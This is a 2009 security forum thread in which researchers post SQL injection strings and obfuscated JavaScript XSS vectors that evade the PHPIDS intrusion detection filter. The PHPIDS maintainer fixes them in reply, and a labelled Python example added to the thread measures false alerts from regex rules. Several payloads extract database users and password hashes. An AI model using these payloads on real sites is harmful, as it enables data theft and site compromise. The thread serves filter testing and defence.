Sla.ckers.org
Whether this is about ha.ckers.org, sla.ckers.org or some other project you are interested in or want to talk about, throw it in here to get feedback. 
Re: PHPIDS (0.5.4 - the cool kid in the IDS class)
Posted by: lightos
Date: March 13, 2009 09:21AM

Managed to get a union working

-1' union ((select 1/1 from Table where (select version( )/ 1) like 5)) order by '1
-1' union ((select (select version()/1 )/1,2/1,3 from Table)) order by '1
-1' union ((select (select user),(select password),1/1 from mysql.user)) order by '1
-1' union ((select (select table_name),1/1 from information_schema.tables)) order by '1
-1' union ((select (select substring((select database() limit 1),1/1,20) limit 1),2/1 from Table)) order by '1

Re: PHPIDS (0.5.4 - the cool kid in the IDS class)
Posted by: Gareth Heyes
Date: March 13, 2009 09:23AM

It seems we have another recruit :)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Re: PHPIDS (0.5.4 - the cool kid in the IDS class)
Posted by: Gareth Heyes
Date: March 13, 2009 09:45AM

Another HTML5 Firefox beta 3.1 vector:-

http://www.businessinfo.co.uk/labs/phpids/phpids8.html

Re: PHPIDS (0.5.4 - the cool kid in the IDS class)
Posted by: Anonymous User
Date: March 22, 2009 11:26AM

Hey guys - late reaction again but I fixed all of the recent vectors. I think there'll be a 0.5.6 the next days to cover all the recent fixes in a release version. Thx for the reports!

Re: PHPIDS (0.5.4 - the cool kid in the IDS class)
Posted by: Reiners
Date: March 22, 2009 02:20PM

5'-1 like binary '0
2'-1 - user() or 1 = '1
asdasd' like id or 1 = '1

you may want to block var declarations too, like:

2'-2 like binary @a:='0

Re: PHPIDS (0.5.4 - the cool kid in the IDS class)
Posted by: thornmaker
Date: March 22, 2009 02:59PM

this[(('eva')+ new Array) + 'l']((/x.x.x.x/+name)+/x.x.x.x/) -> http://p42.us/phpids/89.html

Re: PHPIDS (0.5.4 - the cool kid in the IDS class)
Posted by: lightos
Date: March 24, 2009 09:33PM

1' having '1
1'; select 'sqli
1'; select 1 order by 1/'1
-1'union ( ((select'null')))--null



Edited 1 time(s). Last edit at 03/25/2009 02:54AM by lightos.

Re: PHPIDS (0.5.4 - the cool kid in the IDS class)
Posted by: thornmaker
Date: March 25, 2009 12:32AM

this[('eva')+this.status +'l'](/xx.x.x/+name) -> http://p42.us/phpids/90.html

Re: PHPIDS (0.5.4 - the cool kid in the IDS class)
Posted by: lightos
Date: March 28, 2009 08:17AM

') | (1 -'
1') | user--null
' having substring(version(),1,1) like 5 or 1 like ' 1
' having substring(user(),1,1) like (select 'r') or 1 like ' 1

Re: PHPIDS (0.5.4 - the cool kid in the IDS class)
Posted by: Gareth Heyes
Date: March 28, 2009 02:56PM

@lightos

Do you have a blog? I'm impressed with your SQLi foo

Re: PHPIDS (0.5.4 - the cool kid in the IDS class)
Posted by: lightos
Date: March 28, 2009 08:04PM

Thanks Gareth, I appreciate the compliment especially from someone of your talents
No blog yet, maybe someday though.

Re: PHPIDS (0.5.4 - the cool kid in the IDS class)
Posted by: lightos
Date: March 31, 2009 06:11PM

1' and 1 != char(null) or 1 /'null
1' and 1 = hex(null-1 or 1) or 1 /'null
-1' or substring(null/null,1/null,1) or '1



Edited 2 time(s). Last edit at 03/31/2009 09:57PM by lightos.

Re: PHPIDS (0.5.4 - the cool kid in the IDS class)
Posted by: thornmaker
Date: March 31, 2009 06:52PM

this[[]+('eva')+(/x/,new Array)+'l'](/xxx.xxx.xxx.xxx.xx/+name,new Array) -> http://p42.us/phpids/91.html

[edit] for fun, this also works: this[[]+('eva')+(/l.is.broken.up.with.a/,new Array)+'l'](/ets.finish.by.passing.it.the.variables/+name,new Array)



Edited 1 time(s). Last edit at 03/31/2009 11:31PM by thornmaker.

Re: PHPIDS (0.5.4 - the cool kid in the IDS class)
Posted by: Anonymous User
Date: April 05, 2009 03:07PM

Hey guys!

Sry for the delayed answer again... I think most of the vectors are now being detected. Thanks a lot! The sqli vectors are really far beyond - very nice work, lightos!

Btw - if you'd like a new application to hammer on just drop me a line. We are opening up five accounts for testing purposes next week (private² alpha so to say) *g*

Greetings and nice rest-of-the-weekend,
.mario

Re: PHPIDS (0.5.4 - the cool kid in the IDS class)
Posted by: lightos
Date: April 05, 2009 04:32PM

1' and 1 != 0x71 or 1 /'null
1' and 1 = 0x71 or 1 or 1 /'null
1'/null or user=0x6C696768746F73 or '0

:)



Edited 1 time(s). Last edit at 04/06/2009 06:19AM by lightos.

Re: PHPIDS (0.5.4 - the cool kid in the IDS class)
Posted by: thornmaker
Date: April 05, 2009 04:37PM

this[[]+('eva')+(/x/,new Array)+'l'](/count%me%in%for%alpha%testing/+name,delete 1) -> http://p42.us/phpids/92.html

Re: PHPIDS (0.5.4 - the cool kid in the IDS class)
Posted by: lightos
Date: April 10, 2009 02:38AM

1' order by 1/*null-PHPIDS
1' and 0x1 like 0x1/*null-
1' and 0x1 = 0x1/*null-
1' and /*null*/0x7 = 0x7 or '0

1' and 0x0 != mid(user(),1,1) or null/ 'null



Edited 1 time(s). Last edit at 04/10/2009 03:12AM by lightos.

Re: PHPIDS (0.5.4 - the cool kid in the IDS class)
Posted by: lightos
Date: April 23, 2009 02:08AM

1' '
1' ''

Simple but works.

Re: PHPIDS (0.5.4 - the cool kid in the IDS class)
Posted by: Anonymous User
Date: April 23, 2009 01:40PM

Nice ones - thx :) The last ones are almost impossible to fix. I tried but am sure this is going to generate tons of false alerts.

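Added example, not part of the thread and not PHPIDS code: the false-alert problem described in the post above, measured with two hypothetical regex rules against the two strings reported on April 23, 2009 and a constructed set of benign inputs.

```python
import re

# The two strings reported in the thread (lightos, April 23, 2009).
REPORTED = ["1' '", "1' ''"]

# Constructed benign form input: ordinary prose that uses apostrophes and quoting.
BENIGN = [
    "O'Brien",
    "the Smiths' 'Meat Is Murder' LP",
    "she answered 'yes' 'no' and 'maybe' in that order",
    "rock 'n' roll",
    "plain text without quotes",
    "the players' 'unofficial' captain",
]

# Hypothetical rules written for this example; they are not taken from PHPIDS.
RULES = {
    "quote-space-quote anywhere": re.compile(r"'\s+'"),
    "whole field is digits-quote-space-quote(s)": re.compile(r"^\d+'\s+'{1,2}$"),
}

def evaluate(rule):
    """Return (reported strings caught, benign strings flagged) for one rule."""
    caught = [s for s in REPORTED if rule.search(s)]
    false_alerts = [s for s in BENIGN if rule.search(s)]
    return caught, false_alerts

def report():
    """Print a per-rule summary and return {rule name: (caught, false alerts)}."""
    rows = {}
    for name, rule in RULES.items():
        caught, false_alerts = evaluate(rule)
        rows[name] = (len(caught), len(false_alerts))
        print(f"{name}: caught {len(caught)}/{len(REPORTED)}, "
              f"false alerts {len(false_alerts)}/{len(BENIGN)}")
        for s in false_alerts:
            print(f"    benign input flagged: {s!r}")
    return rows

if __name__ == "__main__":
    report()
```

The unanchored rule catches both reported strings but also flags ordinary quoted prose; the anchored rule is quiet on prose only because it matches nothing except a field of exactly that shape.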
Re: PHPIDS (0.5.4 - the cool kid in the IDS class)
Posted by: Gareth Heyes
Date: April 23, 2009 03:22PM

I was gonna IM you this but then I thought other people would want to know. What is happening with PHPIDS? Do you still plan to go down the blacklist route? Is the project going to continue?

Re: PHPIDS (0.5.4 - the cool kid in the IDS class)
Posted by: Anonymous User
Date: April 23, 2009 03:40PM

I wasn't planning to announce that way but...

Honestly I plan to give up the lead - someone else will be taking over in July. The thing is it already does most of what it can do and my motivation is not that high anymore to make minor regex tweaks once or twice a week. So some fresh wind for the PHPIDS can't be wrong...



Edited 1 time(s). Last edit at 04/23/2009 03:44PM by .mario.

Re: PHPIDS (0.5.4 - the cool kid in the IDS class)
Posted by: Gareth Heyes
Date: April 24, 2009 09:08AM

Hey Mario sorry if you didn't want anyone to know yet (me and my big mouth).

I'd just like to say well done on a fantastic project and although you are not continuing it you can be proud of what you have achieved. So many good things have come out of the phpids research, the vectors have always been great to work on and can be a real challenge to produce one at times.

I hope the PHPIDS project continues after you've left as I'm a big fan of it. If I ever go to a conference then I'll be sure to buy you, Christian and Lars a well deserved beer.

Re: PHPIDS (0.5.4 - the cool kid in the IDS class)
Posted by: Spyware
Date: April 24, 2009 09:56PM

I always followed this thread with great interest. You guys did a great job of developing a wonderful application which provoked a lot of (bleeding-edge) research. Mario, Christian and Lars, well done!

Re: PHPIDS (0.5.4 - the cool kid in the IDS class)
Posted by: Gareth Heyes
Date: May 11, 2009 05:29PM

-setTimeout(
1E1+
',aler\
t ( /Mario dont go, its fun phpids rocks/ ) + 1E100000 ' )

Re: PHPIDS (0.5.4 - the cool kid in the IDS class)
Posted by: Anonymous User
Date: May 11, 2009 06:42PM

Unbelievable stuff :) Fixed, thx!

Re: PHPIDS (0.5.4 - the cool kid in the IDS class)
Posted by: sirdarckcat
Date: May 12, 2009 06:31AM

still works?
http://bit.ly/xhizE

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Re: PHPIDS (0.5.4 - the cool kid in the IDS class)
Posted by: Gareth Heyes
Date: June 01, 2009 05:28AM

http://www.thespanner.co.uk/2009/06/01/new-phpids-vector/

MMMMMMMMM vectors

Re: PHPIDS (0.6 - the ABP unblock release to show our good will :) )
Posted by: thornmaker
Date: June 01, 2009 08:44AM

that's the coolest vector i've seen all year Gareth :)

and since you revived the thread, here's a couple more (nothing especially new): http://p42.us/phpids/93.html and http://p42.us/phpids/93.html

Re: PHPIDS (0.6 - the ABP unblock release to show our good will :) )
Posted by: Gareth Heyes
Date: June 01, 2009 08:58AM

haha sweeeeeeeeeeet that's some huge payload

Re: PHPIDS (0.6 - the ABP unblock release to show our good will :) )
Posted by: Anonymous User
Date: June 01, 2009 06:33PM

Hehe - nice indeed. And fixed. Foreverandever :)
